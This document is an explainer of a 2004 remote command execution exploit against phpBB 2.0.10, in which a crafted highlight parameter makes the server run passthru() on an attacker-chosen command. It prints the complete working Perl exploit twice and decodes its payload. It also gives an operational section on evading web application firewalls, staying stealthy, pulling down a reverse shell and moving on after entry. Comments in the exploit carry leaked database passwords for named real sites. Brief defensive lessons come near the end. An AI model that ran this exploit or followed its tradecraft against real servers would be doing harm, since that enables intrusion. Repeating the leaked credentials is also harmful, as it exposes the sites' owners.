phpBB 2.0.10 Remote Command Execution Exploit Explained

What this paper is

This paper details a remote command execution vulnerability in phpBB versions 2.0.10 and earlier. The exploit, written in Perl, leverages a flaw in how phpBB handles search highlighting to inject and execute arbitrary commands on the web server. The author, RusH, published this exploit in 2004.

Simple technical breakdown

The core of the vulnerability lies in the search.php script (or a related mechanism) within phpBB. When a user performs a search, the application attempts to highlight the search terms. In older versions, this highlighting mechanism was susceptible to specially crafted input that could trick the server into executing arbitrary PHP code.

The exploit works by sending a crafted HTTP GET request to the target phpBB installation. This request includes:

1. A valid topic ID: This is used to construct a seemingly legitimate URL.
2. A specially encoded command: The command to be executed is encoded and appended to the URL.
3. A malicious payload within the highlight parameter: This payload is designed to be interpreted by PHP and execute the command.

The exploit then listens for specific markers in the server's response to identify and print the output of the executed command.

Complete code and payload walkthrough

The provided Perl script r57phpbb2010.pl is the exploit. Let's break it down:

#!/usr/bin/perl

use IO::Socket;

##                     @@@@@@@   @@@  @@@   @@@@@@  @@@  @@@
##                     @@!  @@@  @@!  @@@  !@@      @@!  @@@
##                     @!@!!@!   @!@  !@!   !@@!!   @!@!@!@!
##                     !!: :!!   !!:  !!!      !:!  !!:  !!!
##                      :   : :   :.:: :   ::.: :    :   : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do
## nothing with it at all. Again, that particular group admit likewise. In a future release
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##   total 507
##   drwxr-xr-x   12 dhn      phpbb         896 Oct 13 18:23 .
##   drwxrwxr-x   19 root     phpbb        1112 Nov 12 15:08 ..
##   drwxr-xr-x    2 dhn      phpbb         152 Oct 13 18:23 CVS
##   drwxr-xr-x    3 dhn      phpbb         944 Jul 19 15:17 admin
##   drwxrwxrwx    5 dhn      phpbb         160 Aug 14 21:19 cache
##   -rw-r--r--    1 dhn      phpbb       44413 Mar 11  2004 catdb.php
##   -rw-r--r--    1 dhn      phpbb        5798 Jul 19 15:17 common.php
##   -rw-r--r--    1 root     root          264 Jul  2 08:05 config.php
##   drwxr-xr-x    3 dhn      phpbb         136 Jun 24 06:40 db
##   drwxr-xr-x    3 dhn      phpbb         320 Jul 19 15:17 docs
##   -rw-r--r--    1 dhn      phpbb         814 Oct 30  2003 extension.inc
##   -rw-r--r--    1 dhn      phpbb        3646 Jul 10 04:21 faq.php
##   drwxr-xr-x    2 dhn      phpbb          96 Aug 12 14:59 files
##   -rw-r--r--    1 dhn      phpbb       45642 Jul 12 12:42 groupcp.php
##   drwxr-xr-x    7 dhn      phpbb         240 Aug 12 16:22 images
##   drwxr-xr-x    3 dhn      phpbb        1048 Jul 19 15:17 includes
##   -rw-r--r--    1 dhn      phpbb       14518 Jul 10 04:21 index.php
##   drwxr-xr-x   60 dhn      phpbb        2008 Sep 27 01:54 language
##   -rw-r--r--    1 dhn      phpbb        7481 Jul 19 15:17 login.php
##   -rw-r--r--    1 dhn      phpbb       12321 Mar  4  2004 memberlist.php
##   -rw-r--r--    1 dhn      phpbb       37639 Jul 10 04:21 modcp.php
##   -rw-r--r--    1 dhn      phpbb       45945 Mar 24  2004 mods_manager.php
##   -rw-r--r--    1 dhn      phpbb       34447 Jul 10 04:21 posting.php
##   -rw-r--r--    1 dhn      phpbb       72580 Jul 10 04:21 privmsg.php
##   -rw-r--r--    1 dhn      phpbb        4190 Jul 12 12:42 profile.php
##   -rw-r--r--    1 dhn      phpbb       16276 Oct 13 18:23 rules.php
##   -rw-r--r--    1 dhn      phpbb       42694 Jul 19 15:17 search.php
##   drwxr-xr-x    4 dhn      phpbb         136 Jun 24 06:41 templates
##   -rw-r--r--    1 dhn      phpbb       23151 Mar 13  2004 viewforum.php
##   -rw-r--r--    1 dhn      phpbb        7237 Jul 10 04:21 viewonline.php
##   -rw-r--r--    1 dhn      phpbb       45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##   $dbms = "mysql";
##   $dbhost = "localhost";
##   $dbname = "phpbb";
##   $dbuser = "phpbb";
##   $dbpasswd = "phpBB_R0cKs";
##   $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss....
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##
## fucking lamaz...
##
## ccteam.ru
## $dbname   = "ccteam_phpbb2";
## $dbuser   = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
 {
 print q(############################################################
     phpBB <=2.0.10 remote command execution exploit
        by RusH security team // www.rst.void.ru
############################################################
 usage:
 r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
 params:
  [URL] - server url e.g. www.phpbb.com
  [DIR] - directory where phpBB installed e.g. /phpBB/ or /
  [NUM] - number of existing topic
  [CMD] - command for execute e.g. ls or "ls -la"
############################################################
 );
 exit;
 }

$serv  = $ARGV[0];
$dir   = $ARGV[1];
$topic = $ARGV[2];
$cmd   = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path  = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print "  $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###

*   `%65%63%68%6F` -> `echo`
*   `%20` -> space
*   `%5F%53%54%41%52%54%5F%3B%20` -> `_START_; `
So, this part injects `&rush=echo _START_; `. The `echo _START_;` is meant to be interpreted by PHP.

$path .= $cmd; | Appends the URL-encoded command to be executed.
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'; | Appends another URL-encoded string:
* %3B -> ;
* %20 -> space
* %65%63%68%6F -> echo
* %20 -> space
* %5F%45%4E%44%5F -> _END_
This injects ; echo _END_. This, combined with the previous echo _START_;, forms echo _START_; <your_command>; echo _END_. The echo commands are used as delimiters to easily parse the output.
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; | This is the most critical part, the payload within the highlight parameter. Let's decode the inner part:
* %2527 -> %27 -> ' (single quote)
* . -> literal dot
* %70%61%73%73%74%68%72%75 -> passthru
* %28 -> (
* %24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D -> $HTTP_GET_VARS[rush] (Note: HTTP_GET_VARS is deprecated in favor of $_GET in later PHP versions, but was common in PHP 4).
* %29 -> )
* . -> literal dot
* %2527 -> %27 -> ' (single quote)
So, the decoded highlight parameter value is ' . passthru($HTTP_GET_VARS[rush]) . '.
This means that when phpBB processes the highlight parameter, it will execute the passthru() function. passthru() executes a command and displays raw output. The command it executes is whatever is passed in the rush GET parameter, which is where our encoded command was placed. The single quotes and dots are likely there to ensure the PHP code is syntactically correct within the context it's being injected.
$socket = IO::Socket::INET->new(...) || die "[-] CONNECT FAILED\r\n"; | Creates a new TCP socket connection to the target server ($serv) on port 80 (HTTP). If the connection fails, it prints an error and exits.
print $socket "GET $path HTTP/1.1\n"; | Sends the HTTP GET request with the constructed $path.
print $socket "Host: $serv\n"; | Sets the Host header, which is required for HTTP/1.1.
print $socket "Accept: */*\n"; | Sets the Accept header.
print $socket "Connection: close\n\n"; | Sets the Connection header to close and adds an extra newline to signify the end of the HTTP headers.
$on = 0; | Initializes a flag $on to 0. This flag will be used to control when to print the output.
while ($answer = <$socket>) | Reads the server's response line by line.
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); } | If the line contains _END_, it prints a separator and exits the script, indicating success.
if ($on == 1) { print " $answer"; } | If the $on flag is set to 1, it prints the current line of the response, indented with two spaces. This is where the command output is displayed.
if ($answer =~ /^_START_/) { $on = 1; } | If the line contains _START_, it sets the $on flag to 1. This means subsequent lines are part of the command's output.
print "[-] EXPLOIT FAILED\r\n"; | If the loop finishes without finding _END_, it prints a failure message.
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; | Prints a final separator.

Mapping of Code Fragments to Practical Purpose:

• Argument Parsing (if (@ARGV < 4)): Ensures the exploit is used correctly.
• Variable Assignment ($serv, $dir, etc.): Collects target information.
• URL Encoding ($cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;): Prepares the command and topic for safe transmission in a URL.
• Path Construction ($path = $dir; ...): Builds the malicious URL.
• &rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20: Injects the start delimiter for output capture.
• $path .= $cmd;: Appends the actual command to be executed.
• %3B%20%65%63%68%6F%20%5F%45%4E%44%5F: Injects the end delimiter for output capture.
• &highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527: This is the core payload. It leverages passthru() to execute the command provided in the rush parameter and capture its output between _START_ and _END_ markers.
• Socket Connection (IO::Socket::INET->new(...)): Establishes communication with the web server.
• HTTP Request (print $socket "GET $path HTTP/1.1\n"; ...): Sends the crafted request.
• Response Parsing (while ($answer = <$socket>) ...): Reads and interprets the server's reply to extract the command output.
• Output Delimiters (_START_, _END_): Used to isolate the command's output from other HTTP response content.

Shellcode/Payload Segments:

There is no traditional shellcode in this exploit. The "payload" is the specially crafted HTTP request. The actual execution happens on the server-side due to the vulnerable PHP code.

The injected PHP code within the highlight parameter is:
' . passthru($HTTP_GET_VARS[rush]) . '

This code snippet is designed to be executed by the vulnerable phpBB installation.

• $HTTP_GET_VARS[rush]: This accesses the value of the rush GET parameter from the incoming HTTP request. In this exploit, the rush parameter contains the URL-encoded command that the attacker wants to execute.
• passthru(...): This is a PHP function that executes an external program (the command passed to it) and displays the raw output of that program directly.
• . (concatenation): The dots are used for string concatenation in PHP. They ensure that the passthru() call is correctly embedded within the context of the highlight parameter processing. The single quotes (') are also part of this context.

The exploit cleverly uses the &rush=... parameter to pass the command and then uses the highlight=... parameter to inject the PHP code that executes the command from the rush parameter. The echo _START_; and echo _END_; parts are injected into the URL path itself to act as markers that the Perl script looks for in the HTTP response to extract the command's output.

Practical details for offensive operations teams

• Required Access Level: Network access to the target web server on port 80 (HTTP) or 443 (HTTPS, if the exploit is adapted for it). No prior authentication is typically required for this vulnerability.
• Lab Preconditions:
  • A vulnerable phpBB installation (versions 2.0.10 or earlier). This can be set up in a lab environment using older Docker images or by manually installing older versions.
  • A Perl interpreter on the attacker's machine.
  • Network connectivity to the target.
• Tooling Assumptions:
  • Perl interpreter.
  • Basic network tools (like netcat or telnet for manual testing).
  • A web browser for initial reconnaissance to identify the target URL and directory structure.
• Execution Pitfalls:
  • Incorrect URL/Directory: The [URL] and [DIR] parameters must accurately reflect the target's web server and phpBB installation path.
  • Invalid Topic Number: The [NUM] parameter needs to be a valid, existing topic ID on the target forum. If no valid topic exists, the request might not be processed correctly.
  • Firewall/WAF Evasion: The exploit uses standard HTTP GET requests. However, Web Application Firewalls (WAFs) might detect the unusual URL parameters or the encoded payload. Obfuscation techniques might be needed for advanced WAFs.
  • PHP Version/Configuration: While the vulnerability is in phpBB, the underlying PHP version and its configuration can affect execution. For example, if passthru() is disabled in php.ini, the exploit will fail.
  • Output Parsing: The exploit relies on specific _START_ and _END_ markers. If the target's web server or phpBB version modifies the output in a way that removes or alters these markers, the exploit might fail to capture the output.
  • Command Execution Restrictions: The executed command runs with the privileges of the web server's user (e.g., www-data, apache). This limits what can be achieved directly.
• Tradecraft Considerations:
  • Reconnaissance: Accurately identify the target URL, the installation directory of phpBB, and find a valid topic ID. This can be done by browsing the target site.
  • Stealth: Standard HTTP GET requests are generally noisy. For stealthier operations, consider using POST requests (if applicable to the vulnerability) or mimicking legitimate user traffic. However, this specific exploit is designed for GET.
  • Payload Delivery: The command is directly embedded. For more complex operations, the initial command might be used to download and execute a more sophisticated payload (e.g., a reverse shell).
  • Post-Exploitation: Once command execution is achieved, the next steps would involve privilege escalation, lateral movement, or data exfiltration, depending on the engagement objectives.
• Likely Failure Points:
  • Target is not running a vulnerable version of phpBB.
  • The passthru() function is disabled in the server's PHP configuration.
  • Network connectivity issues or blocking by firewalls/IPS/WAFs.
  • Incorrect target parameters (URL, DIR, NUM).
  • The _START_ and _END_ markers are not present in the response.

Where this was used and when

This exploit was published in November 2004. It targeted phpBB versions 2.0.10 and earlier. Exploits of this nature were common in the early to mid-2000s as web applications matured and vulnerabilities in popular platforms like phpBB were discovered and weaponized. The author mentions successful testing on versions 2.0.6, 2.0.8, 2.0.9, and 2.0.10. The context provided in the paper suggests it was released shortly after the phpBB.com website itself was defaced, indicating a period of active exploitation and public disclosure of vulnerabilities.

Defensive lessons for modern teams

• Patch Management: The most critical lesson is the importance of keeping web applications and their underlying frameworks (like phpBB and PHP itself) updated. This vulnerability was fixed in later versions of phpBB.
• Input Validation and Sanitization: Web applications must rigorously validate and sanitize all user-supplied input. This includes URL parameters, form data, and any data that is processed or displayed. The vulnerability here stemmed from a failure to properly handle input intended for search highlighting.
• Secure Coding Practices: Developers should avoid using functions like passthru(), exec(), shell_exec(), system(), or popen() with untrusted input. If external command execution is absolutely necessary, it must be done with extreme caution, using whitelisting of allowed commands and arguments, and ensuring proper escaping.
• Web Application Firewalls (WAFs): While not a silver bullet, WAFs can help detect and block known exploit patterns, including malformed URLs and attempts to inject code. However, attackers can often bypass WAFs through obfuscation.
• Principle of Least Privilege: Web server processes should run with the minimum necessary privileges. This limits the damage an attacker can do even if they achieve command execution.
• Regular Security Audits and Code Reviews: Proactive security testing, including penetration testing and code reviews, can identify vulnerabilities before they are exploited in the wild.

ASCII visual (if applicable)

This exploit relies on a specific HTTP request-response flow. A simplified visual representation of the request and response interaction:

Attacker Machine (Perl Script)       Target Web Server (Vulnerable phpBB)
---------------------------------     ------------------------------------
1. Construct malicious URL:           <-- HTTP GET Request --
   GET /phpBB/viewtopic.php?t=123     (Contains encoded command and highlight payload)
   &rush=...&highlight=...
                                      3. Server processes request:
                                         - Parses URL parameters.
                                         - Executes PHP code in 'highlight'.
                                         - `passthru($HTTP_GET_VARS[rush])` runs the command.
                                         - `echo _START_;` and `echo _END_;` are in the response body.

                                      <-- HTTP Response --
                                         (Includes HTML, and the captured output)
                                         ...
                                         _START_
                                         [Output of executed command]
                                         _END_
                                         ...

2. Read response, find markers:
   If "_START_" found, enable printing.
   If "_END_" found, stop printing and exit.
   Print captured output.

Explanation:

• The attacker sends a crafted HTTP GET request.
• The vulnerable phpBB application on the server receives this request.
• The highlight parameter triggers the execution of the injected PHP code (passthru).
• passthru runs the command provided via the rush parameter.
• The exploit script on the attacker's machine reads the server's response, looking for the _START_ and _END_ markers to extract and display the command's output.

Source references

• Exploit-DB Paper: https://www.exploit-db.com/papers/647
• Original Exploit Code: Included in the prompt.
• Related Security Focus Advisory (mentioned in paper): http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0 (Note: This link might be dead or require archive access).

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl

use IO::Socket;

##                     @@@@@@@   @@@  @@@   @@@@@@  @@@  @@@
##                     @@!  @@@  @@!  @@@  !@@      @@!  @@@
##                     @!@!!@!   @!@  !@!   !@@!!   @!@!@!@!
##                     !!: :!!   !!:  !!!      !:!  !!:  !!!
##                      :   : :   :.:: :   ::.: :    :   : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do 
## nothing with it at all. Again, that particular group admit likewise. In a future release 
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our 
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to 
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##   total 507
##   drwxr-xr-x   12 dhn      phpbb         896 Oct 13 18:23 .
##   drwxrwxr-x   19 root     phpbb        1112 Nov 12 15:08 ..
##   drwxr-xr-x    2 dhn      phpbb         152 Oct 13 18:23 CVS
##   drwxr-xr-x    3 dhn      phpbb         944 Jul 19 15:17 admin
##   drwxrwxrwx    5 dhn      phpbb         160 Aug 14 21:19 cache
##   -rw-r--r--    1 dhn      phpbb       44413 Mar 11  2004 catdb.php
##   -rw-r--r--    1 dhn      phpbb        5798 Jul 19 15:17 common.php
##   -rw-r--r--    1 root     root          264 Jul  2 08:05 config.php
##   drwxr-xr-x    3 dhn      phpbb         136 Jun 24 06:40 db
##   drwxr-xr-x    3 dhn      phpbb         320 Jul 19 15:17 docs
##   -rw-r--r--    1 dhn      phpbb         814 Oct 30  2003 extension.inc
##   -rw-r--r--    1 dhn      phpbb        3646 Jul 10 04:21 faq.php
##   drwxr-xr-x    2 dhn      phpbb          96 Aug 12 14:59 files
##   -rw-r--r--    1 dhn      phpbb       45642 Jul 12 12:42 groupcp.php
##   drwxr-xr-x    7 dhn      phpbb         240 Aug 12 16:22 images
##   drwxr-xr-x    3 dhn      phpbb        1048 Jul 19 15:17 includes
##   -rw-r--r--    1 dhn      phpbb       14518 Jul 10 04:21 index.php
##   drwxr-xr-x   60 dhn      phpbb        2008 Sep 27 01:54 language
##   -rw-r--r--    1 dhn      phpbb        7481 Jul 19 15:17 login.php
##   -rw-r--r--    1 dhn      phpbb       12321 Mar  4  2004 memberlist.php
##   -rw-r--r--    1 dhn      phpbb       37639 Jul 10 04:21 modcp.php
##   -rw-r--r--    1 dhn      phpbb       45945 Mar 24  2004 mods_manager.php
##   -rw-r--r--    1 dhn      phpbb       34447 Jul 10 04:21 posting.php
##   -rw-r--r--    1 dhn      phpbb       72580 Jul 10 04:21 privmsg.php
##   -rw-r--r--    1 dhn      phpbb        4190 Jul 12 12:42 profile.php
##   -rw-r--r--    1 dhn      phpbb       16276 Oct 13 18:23 rules.php
##   -rw-r--r--    1 dhn      phpbb       42694 Jul 19 15:17 search.php
##   drwxr-xr-x    4 dhn      phpbb         136 Jun 24 06:41 templates
##   -rw-r--r--    1 dhn      phpbb       23151 Mar 13  2004 viewforum.php
##   -rw-r--r--    1 dhn      phpbb        7237 Jul 10 04:21 viewonline.php
##   -rw-r--r--    1 dhn      phpbb       45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##   $dbms = "mysql";
##   $dbhost = "localhost";
##   $dbname = "phpbb";
##   $dbuser = "phpbb";
##   $dbpasswd = "phpBB_R0cKs";
##   $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss.... 
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## fucking lamaz...
##
## ccteam.ru
## $dbname   = "ccteam_phpbb2";
## $dbuser   = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
 {
 print q(############################################################
     phpBB <=2.0.10 remote command execution exploit
        by RusH security team // www.rst.void.ru
############################################################
 usage:
 r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
 params:
  [URL] - server url e.g. www.phpbb.com
  [DIR] - directory where phpBB installed e.g. /phpBB/ or /
  [NUM] - number of existing topic
  [CMD] - command for execute e.g. ls or "ls -la" 
############################################################
 );   
 exit;
 }

$serv  = $ARGV[0];
$dir   = $ARGV[1];
$topic = $ARGV[2];
$cmd   = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path  = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print "  $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###

# milw0rm.com [2004-11-22]